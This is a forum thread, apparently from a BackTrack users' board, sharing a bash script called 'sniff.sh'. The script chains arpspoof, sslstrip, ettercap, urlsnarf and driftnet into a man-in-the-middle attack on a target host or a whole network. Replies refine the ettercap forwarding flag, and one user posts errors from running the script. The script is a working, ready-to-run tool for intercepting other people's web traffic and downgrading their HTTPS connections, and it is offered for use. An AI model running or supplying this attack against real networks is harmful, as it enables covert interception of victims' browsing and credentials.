Thread: sniff.sh for BT5

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default sniff.sh for BT5

    There was a small problem with the script running on BT5.
    It's fixed now, though I haven't tested it fully.

    Code:
    #!/bin/bash
    
    # Script for sniffing HTTPS connections.
    # The script uses Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT5
    # BY gHero,cseven,spudgunman.
    # Ver 0.3
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'; bash' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'; bash' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt ; bash' &
    
    # DRIFTNET
    driftnet -p -i $INT &

  2. #2
    Member
    Join Date
    Jan 2010
    Location
    Netherlands
    Posts
    84

    Default Re: sniff.sh for BT5

    can't test it right now but looks nice! Will give it a try sometime, thanks!

  3. #3
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: sniff.sh for BT5

    Quote Originally Posted by ghero
    echo '1' > /proc/sys/net/ipv4/ip_forward
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &

    I say the following with all due respect; but the honesty and truth in what I say must be stated without worrying about hurt feelings.

    Please....Stop being a damn script kiddie with these tools. They are weapons, and you are mishandling them. Read the instructions before you use a weapon, otherwise you're going to have undesired effects.

    Here is my best advice to you guys/gals. I am going to use the 4 Marine Corps weapons safety rules as an example:
    • Treat every weapon as if it were loaded
    • Never point a weapon at anything you do not intend to shoot
    • Keep your finger straight and off the trigger until you intend to fire
    • Keep your weapon on safe until you intend to fire


    For MITM style attacks that use ARP you must first decide if you wish to do the packet forwarding using ettercap or the kernel. The caveat here is that if you wish to do anything really cool with ettercap you must use it in offensive mode. It uses offensive mode by default. To disable offensive mode append the flag: -u to the syntax. Otherwise you will get double packets or break the process altogether (reference trying to run offensive mode against a SoftAP via Airbase-NG in conjunction with kernel forwarding).

    If you want to use the kernel for forwarding the following syntax would be proper:
    Code:
    echo '1' > /proc/sys/net/ipv4/ip_forward
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -u -i '$INT' ; bash' &
    If you want to use ettercap for the forwarding disregard any usage of the kernel: i.e. do not echo a 1 into ip_forward. This is strongly recommended because using ettercap allows you to do some really neat stuff.
    I started to directly modify yer code and post it here for you with my own little takes on it, but stopped a quarter of the way through and erased because my help was not asked for, therefore it would have been intolerably rude of me to be modifying yer coding without asking. I will be more than happy to help you make this into a beast of a script, if ya want. If not I understand and do not take any offense. Let me know.


    V/r,
    Snafu
    Pffbt..
    I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass..

  4. #4
    Just burned his ISO
    Join Date
    Jul 2011
    Posts
    1

    Default Re: sniff.sh for BT5

    Quote Originally Posted by snafu777
    Here is my best advice to you guys/gals. I am going to use the 4 Marine Corps weapons safety rules as an example:
    • Treat every weapon as if it were loaded
    • Never point a weapon at anything you do not intend to shoot
    • Keep your finger straight and off the trigger until you intend to fire
    • Keep your weapon on safe until you intend to fire

    There is a 5th rule:
    - Know your target and what lies beyond it.

    I know how to use all these weapons now, but way back in the day I started out by downloading scripts and observing what they do. Although I can write my own scripts, which I do for more complicated stuff, it's easier to just download one and save yourself some time on a simple MITM attack.

  5. #5
    Just burned his ISO jacko's Avatar
    Join Date
    Jan 2011
    Posts
    13

    Default Re: sniff.sh for BT5

    Quote Originally Posted by snafu777
    For MITM style attacks that use ARP you must first decide if you wish to do the packet forwarding using ettercap or the kernel. The caveat here is that if you wish to do anything really cool with ettercap you must use it in offensive mode. It uses offensive mode by default. To disable offensive mode append the flag: -u to the syntax. Otherwise you will get double packets or break the process altogether (reference trying to run offensive mode against a SoftAP via Airbase-NG in conjunction with kernel forwarding).

    If you want to use the kernel for forwarding the following syntax would be proper:
    Code:
    echo '1' > /proc/sys/net/ipv4/ip_forward
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -u -i '$INT' ; bash' &
    If you want to use ettercap for the forwarding disregard any usage of the kernel: i.e. do not echo a 1 into ip_forward. This is strongly recommended because using ettercap allows you to do some really neat stuff.
    I started to directly modify yer code and post it here for you with my own little takes on it, but stopped a quarter of the way through and erased because my help was not asked for, therefore it would have been intolerably rude of me to be modifying yer coding without asking. I will be more than happy to help you make this into a beast of a script, if ya want.

    qft.. when I was writing my script micheal jacksons touch.. I saw this in Wireshark - it takes some messing around to see ettercap forwards though

  6. #6
    Member
    Join Date
    Jan 2010
    Location
    Netherlands
    Posts
    84

    Default Re: sniff.sh for BT5

    Just tested it:
    root@bt:~/Desktop/scripts# bash sniff.sh
    : command not found
    : command not found

    .__ _____ _____ .__
    ______ ____ |__|/ ____\/ ____\ _____| |__
    / ___// \| \ __\\ __\ / ___/ | \
    \___ \| | \ || | | | \___ \| Y \
    /____ >___| /__||__| |__| /\/____ >___| /
    \/ \/ \/ \/ \/

    : command not found
    : command not found
    : No such file or directorys/net/ipv4/ip_forward
    : command not found
    : command not found
    'ptables v1.4.4: unknown option `--flush
    Try `iptables -h' or 'iptables --help' for more information.
    sleep: invalid time interval `1\r'
    Try `sleep --help' for more information.
    : command not found
    : command not found
    : command not found
    : command not foundRP a (T)arget or full (N)etwork? sniff.sh: line 30:

    Was hoping for a new sniffing.sh script just like the one from:
    http://www.backtrack-linux.org/forum...-urlsnarf.html
    Too bad I am a Linux code noob
